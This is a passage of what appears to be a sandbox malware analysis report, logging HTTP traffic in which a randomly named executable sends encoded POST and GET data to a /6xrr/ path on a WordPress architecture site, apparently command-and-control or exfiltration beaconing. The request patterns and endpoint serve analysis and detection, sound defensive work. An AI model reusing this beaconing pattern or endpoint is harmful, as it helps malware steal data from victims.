                                                                              Jan 11, 2025 09:27:24.773941994 CET224INData Raw: 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 30 36 39 33 65 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 23 39 62 35 31 65 30
                                                                              Data Ascii: preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--grad
                                                                              Jan 11, 2025 09:27:24.779122114 CET1236INData Raw: 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 31 32 32 2c 32 32 30 2c 31 38 30
                                                                              Data Ascii: ient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 10


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.849711134.0.14.158803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:27:26.465841055 CET654OUTPOST /6xrr/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 226
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.aballanet.cat
                                                                              Origin: http://www.aballanet.cat
                                                                              Referer: http://www.aballanet.cat/6xrr/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 4b 7a 68 67 58 51 68 42 2f 49 47 6c 36 46 55 42 79 6d 59 43 31 73 39 51 56 63 62 70 33 50 31 4d 32 58 4c 77 33 39 7a 61 4f 32 35 35 47 70 7a 63 4f 31 2f 62 48 6d 53 62 65 30 6e 75 4b 57 4a 44 39 36 48 53 55 57 6b 4f 41 62 55 74 47 6f 4e 46 61 5a 79 65 66 62 36 72 6a 68 6f 55 70 70 5a 35 39 34 58 70 33 4b 61 64 2f 32 78 37 39 63 49 2f 54 39 31 39 44 6a 6c 42 47 2f 71 37 6e 59 2f 45 36 76 70 62 4b 5a 46 76 36 69 30 52 69 6b 6e 5a 4f 57 43 4c 54 30 52 79 77 74 2f 6b 6d 59 34 55 34 52 79 55 51 48 71 56 44 54 37 75 75 43 79 6b 4e 43 2f 47 51 44 41 76 6d 7a 35 59 64 44 62 47 38 66 75 71 30 52 4d 72 4b 79 6a 78 77 35 65 64 6a 43 4c 2b 65 2f 74 50 6d 47 39 77
                                                                              Data Ascii: DzLTc=KzhgXQhB/IGl6FUBymYC1s9QVcbp3P1M2XLw39zaO255GpzcO1/bHmSbe0nuKWJD96HSUWkOAbUtGoNFaZyefb6rjhoUppZ594Xp3Kad/2x79cI/T919DjlBG/q7nY/E6vpbKZFv6i0RiknZOWCLT0Rywt/kmY4U4RyUQHqVDT7uuCykNC/GQDAvmz5YdDbG8fuq0RMrKyjxw5edjCL+e/tPmG9w
                                                                              Jan 11, 2025 09:27:27.306538105 CET1236INHTTP/1.1 404 Not Found
                                                                              Date: Sat, 11 Jan 2025 08:27:27 GMT
                                                                              Server: Apache
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"
                                                                              Upgrade: h2,h2c
                                                                              Connection: Upgrade, close
                                                                              Transfer-Encoding: chunked
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 [TRUNCATED]
                                                                              Data Ascii: 14bd<!doctype html><html lang="ca" class="no-js"> <head> <meta charset="UTF-8"> <title>Pgina no trobada - Albert Aballanet</title> <meta name="keywords" content="Albert Aballanet, Arquitecto Doctor UPC, trayectoria, tesis de estudio, publicaciones de Albert Aballanet, La casa a cuatro vientos en la Bonanova"> <link href="//www.google-analytics.com" rel="dns-prefetch"> <link href="http://aballanet.cat/wp-content/themes/rwd-theme/img/icons/touch.png" rel="apple-touch-icon-precomposed"> <link rel="alternate" type="application/rss+xml" title="Albert Aballanet" href="https://aballanet.cat/feed/" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="Arquitecte Doctor UP
                                                                              Jan 11, 2025 09:27:27.306564093 CET1236INData Raw: 43 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69
                                                                              Data Ascii: C"> <meta name='robots' content='noindex, follow' /><style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>... This site is optimized with the Yoast SEO plugin v23.1 - https://yoa
                                                                              Jan 11, 2025 09:27:27.306581974 CET448INData Raw: 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77
                                                                              Data Ascii: .w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/aballanet.cat\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}};
                                                                              Jan 11, 2025 09:27:27.306588888 CET1236INData Raw: 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33
                                                                              Data Ascii: {e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageDa
                                                                              Jan 11, 2025 09:27:27.306596994 CET1236INData Raw: 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69
                                                                              Data Ascii: peof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=
                                                                              Jan 11, 2025 09:27:27.306680918 CET276INData Raw: 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72
                                                                              Data Ascii: {n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemoji
                                                                              Jan 11, 2025 09:27:27.306751013 CET1236INData Raw: 32 30 30 30 0d 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 09 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 20 69 6d 67
                                                                              Data Ascii: 2000<style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0
                                                                              Jan 11, 2025 09:27:27.306756020 CET224INData Raw: 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 65 64 69 74 6f 72 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74
                                                                              Data Ascii: 1' media='all' /><link rel='stylesheet' id='wp-editor-css' href='http://aballanet.cat/wp-includes/css/dist/editor/style.min.css?ver=6.7.1' media='all' /><link rel='stylesheet' id='algori_pdf_viewer-cgb-style-css-css' href=
                                                                              Jan 11, 2025 09:27:27.306771040 CET1236INData Raw: 27 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 61 6c 67 6f 72 69 2d 70 64 66 2d 76 69 65 77 65 72 2f 64 69 73 74 2f 62 6c 6f 63 6b 73 2e 73 74 79 6c 65 2e 62 75 69 6c 64
                                                                              Data Ascii: 'http://aballanet.cat/wp-content/plugins/algori-pdf-viewer/dist/blocks.style.build.css' media='all' /><style id='classic-theme-styles-inline-css' type='text/css'>/*! This file is auto-generated */.wp-block-button__link{color:#fff;background
                                                                              Jan 11, 2025 09:27:27.306777000 CET1236INData Raw: 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 30 36 39 33 65 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 23 39 62 35 31 65 30
                                                                              Data Ascii: preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-c
                                                                              Jan 11, 2025 09:27:27.311793089 CET1236INData Raw: 2c 38 31 2c 31 39 32 29 20 35 30 25 2c 72 67 62 28 36 35 2c 38 38 2c 32 30 38 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 70 61 6c 65 2d 6f 63 65 61 6e 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69
                                                                              Data Ascii: ,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.849712134.0.14.158803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:27:29.008991003 CET1671OUTPOST /6xrr/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 1242
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.aballanet.cat
                                                                              Origin: http://www.aballanet.cat
                                                                              Referer: http://www.aballanet.cat/6xrr/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 4b 7a 68 67 58 51 68 42 2f 49 47 6c 36 46 55 42 79 6d 59 43 31 73 39 51 56 63 62 70 33 50 31 4d 32 58 4c 77 33 39 7a 61 4f 32 78 35 61 4c 37 63 63 6d 48 62 47 6d 53 62 43 6b 6e 76 4b 57 49 66 39 36 2b 36 55 57 34 77 41 5a 63 74 48 4c 56 46 63 73 47 65 57 62 36 72 38 52 6f 58 6a 4a 5a 67 39 34 48 74 33 4b 4b 64 2f 32 78 37 39 66 51 2f 56 70 70 39 42 6a 6c 43 57 76 71 2f 6a 59 2f 73 36 76 77 6d 4b 5a 52 2f 36 54 55 52 6a 45 33 5a 4a 6b 36 4c 50 6b 52 6e 7a 74 2f 43 6d 59 6c 45 34 52 75 6d 51 48 65 72 44 53 50 75 74 48 76 4e 4a 54 58 48 45 7a 49 4b 6c 42 78 35 64 79 33 46 79 75 79 34 35 6a 6f 45 4d 55 7a 71 32 59 75 43 6d 31 61 6d 4d 65 70 67 32 69 45 38 68 53 52 4d 75 35 6c 59 34 52 6b 6b 62 38 61 31 4b 47 4b 46 6c 41 34 46 4e 66 54 79 6f 6d 63 67 61 30 31 6e 69 35 65 75 34 46 30 48 30 61 37 32 30 4e 4f 63 71 74 34 61 2b 4f 4e 49 73 4d 4b 33 36 53 4a 64 34 53 52 41 52 45 33 6e 6f 45 4b 76 78 43 48 30 78 69 53 74 53 52 6a 50 52 51 37 47 55 35 74 64 55 66 50 5a 6a 35 2b 52 75 62 78 74 [TRUNCATED]
                                                                              Data Ascii: DzLTc=KzhgXQhB/IGl6FUBymYC1s9QVcbp3P1M2XLw39zaO2x5aL7ccmHbGmSbCknvKWIf96+6UW4wAZctHLVFcsGeWb6r8RoXjJZg94Ht3KKd/2x79fQ/Vpp9BjlCWvq/jY/s6vwmKZR/6TURjE3ZJk6LPkRnzt/CmYlE4RumQHerDSPutHvNJTXHEzIKlBx5dy3Fyuy45joEMUzq2YuCm1amMepg2iE8hSRMu5lY4Rkkb8a1KGKFlA4FNfTyomcga01ni5eu4F0H0a720NOcqt4a+ONIsMK36SJd4SRARE3noEKvxCH0xiStSRjPRQ7GU5tdUfPZj5+Rubxt5LPXSdezx+fe6h6KO82rWi8xK2hPhQUrhfCZI7Tpw9b3kyCBFjcGVVsHyMizva9uYgh1MIVYl0RHjYCJAV5SoDZUh4TfcvVOivTBXppFuxK/jigPfTT3+qenhL0R7sNl8aEvMTqKuwK4cKpwHHBNpk5+JcZ7s0RSpCEIWgCKtS4zPw4i8lI1phaALXd11PUholXDs4LG6zdGiBsHreppqE8igrNvZuhbmjFDY3SNxrzvdDQWUSUav2+/Y/qdozslRzFzI0dzLaJsg3kp5qp16nzdM7V+AGC2samdriFyFuqzB6HIiIiFjsGKDrlBPbDYJz968u7BMGx+EiqbYMDg4VZK5irbrHPUNTqIpxVtcWSJNMxIl6Da8+hxsngAhQf7T9MLYXZVKphVKmSU6lP+/0ytZtlroqcJ4S4wLW825hDq4Nge7ydjIXC6a932F+DnUUW5BHvsUSaB0tnOvPzcRIvf6HsjOe4nTXqgtU5fU7AU/LtlVfhTZaAX5lUaJ6wKF7M3RPk1a1BEmszAcdf6NA5rbnoODOvdPMde9WBnjuLFJjKt2GhqXxEBSKBL/XIbq1rNZqYcSkVYsoZuw+/35KGlKZyRoJ74xBEK6Etjp2tYCCKpm26DBaSQUBOilCjFq3sDRBuIHSBHaM7tkcPe0cBj/B1pSnumfz [TRUNCATED]
                                                                              Jan 11, 2025 09:27:29.844671011 CET1236INHTTP/1.1 404 Not Found
                                                                              Date: Sat, 11 Jan 2025 08:27:29 GMT
                                                                              Server: Apache
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"
                                                                              Upgrade: h2,h2c
                                                                              Connection: Upgrade, close
                                                                              Transfer-Encoding: chunked
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 [TRUNCATED]
                                                                              Data Ascii: 14bd<!doctype html><html lang="ca" class="no-js"> <head> <meta charset="UTF-8"> <title>Pgina no trobada - Albert Aballanet</title> <meta name="keywords" content="Albert Aballanet, Arquitecto Doctor UPC, trayectoria, tesis de estudio, publicaciones de Albert Aballanet, La casa a cuatro vientos en la Bonanova"> <link href="//www.google-analytics.com" rel="dns-prefetch"> <link href="http://aballanet.cat/wp-content/themes/rwd-theme/img/icons/touch.png" rel="apple-touch-icon-precomposed"> <link rel="alternate" type="application/rss+xml" title="Albert Aballanet" href="https://aballanet.cat/feed/" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="Arquitecte Doctor UP
                                                                              Jan 11, 2025 09:27:29.844696045 CET224INData Raw: 43 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69
                                                                              Data Ascii: C"> <meta name='robots' content='noindex, follow' /><style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>... This site is optimized with the Yoast SEO plugin
                                                                              Jan 11, 2025 09:27:29.844706059 CET1236INData Raw: 76 32 33 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63
                                                                              Data Ascii: v23.1 - https://yoast.com/wordpress/plugins/seo/ --><meta property="og:locale" content="ca_ES" /><meta property="og:title" content="Pgina no trobada - Albert Aballanet" /><meta property="og:site_name" content="Albert Aballanet" /><sc
                                                                              Jan 11, 2025 09:27:29.844727039 CET1236INData Raw: 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 37 2e 31 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75
                                                                              Data Ascii: in.js?ver=6.7.1"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.
                                                                              Jan 11, 2025 09:27:29.844738960 CET448INData Raw: 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c 79 3a 21 30 7d 29 2c 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20
                                                                              Data Ascii: illReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="w
                                                                              Jan 11, 2025 09:27:29.844794989 CET1236INData Raw: 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e
                                                                              Data Ascii: nction(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("un
                                                                              Jan 11, 2025 09:27:29.844808102 CET1236INData Raw: 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 0d 0a 32 30 30 30 0d 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c
                                                                              Data Ascii: nt),window._wpemojiSettings);/* ... */</script>2000<style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1e
                                                                              Jan 11, 2025 09:27:29.844861031 CET448INData Raw: 77 70 2d 69 6e 63 6c 75 64 65 73 2f 63 73 73 2f 64 69 73 74 2f 70 61 74 74 65 72 6e 73 2f 73 74 79 6c 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 37 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73
                                                                              Data Ascii: wp-includes/css/dist/patterns/style.min.css?ver=6.7.1' media='all' /><link rel='stylesheet' id='wp-editor-css' href='http://aballanet.cat/wp-includes/css/dist/editor/style.min.css?ver=6.7.1' media='all' /><link rel='stylesheet' id='algori_pd
                                                                              Jan 11, 2025 09:27:29.844873905 CET1236INData Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 32 33
                                                                              Data Ascii: file is auto-generated */.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:
                                                                              Jan 11, 2025 09:27:29.844902039 CET1116INData Raw: 37 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69
                                                                              Data Ascii: 7,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradi
                                                                              Jan 11, 2025 09:27:29.849606037 CET1236INData Raw: 69 65 6e 74 2d 2d 70 61 6c 65 2d 6f 63 65 61 6e 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 2c 32 34 35 2c 32 30 33 29 20 30 25 2c 72 67 62 28 31 38 32 2c 32 32 37 2c 32 31 32 29 20 35 30 25 2c
                                                                              Data Ascii: ient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight:


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.849713134.0.14.158803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:27:31.551673889 CET377OUTGET /6xrr/?DzLTc=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBQY2hj09WsNhqz7jh3pjJtHZ6ivVVWaE+CFUoLu/IsL675g==&m8=urJ0WtmP0FPTTB HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.aballanet.cat
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Jan 11, 2025 09:27:32.368977070 CET505INHTTP/1.1 301 Moved Permanently
                                                                              Date: Sat, 11 Jan 2025 08:27:32 GMT
                                                                              Server: Apache
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              X-Redirect-By: WordPress
                                                                              Upgrade: h2,h2c
                                                                              Connection: Upgrade, close
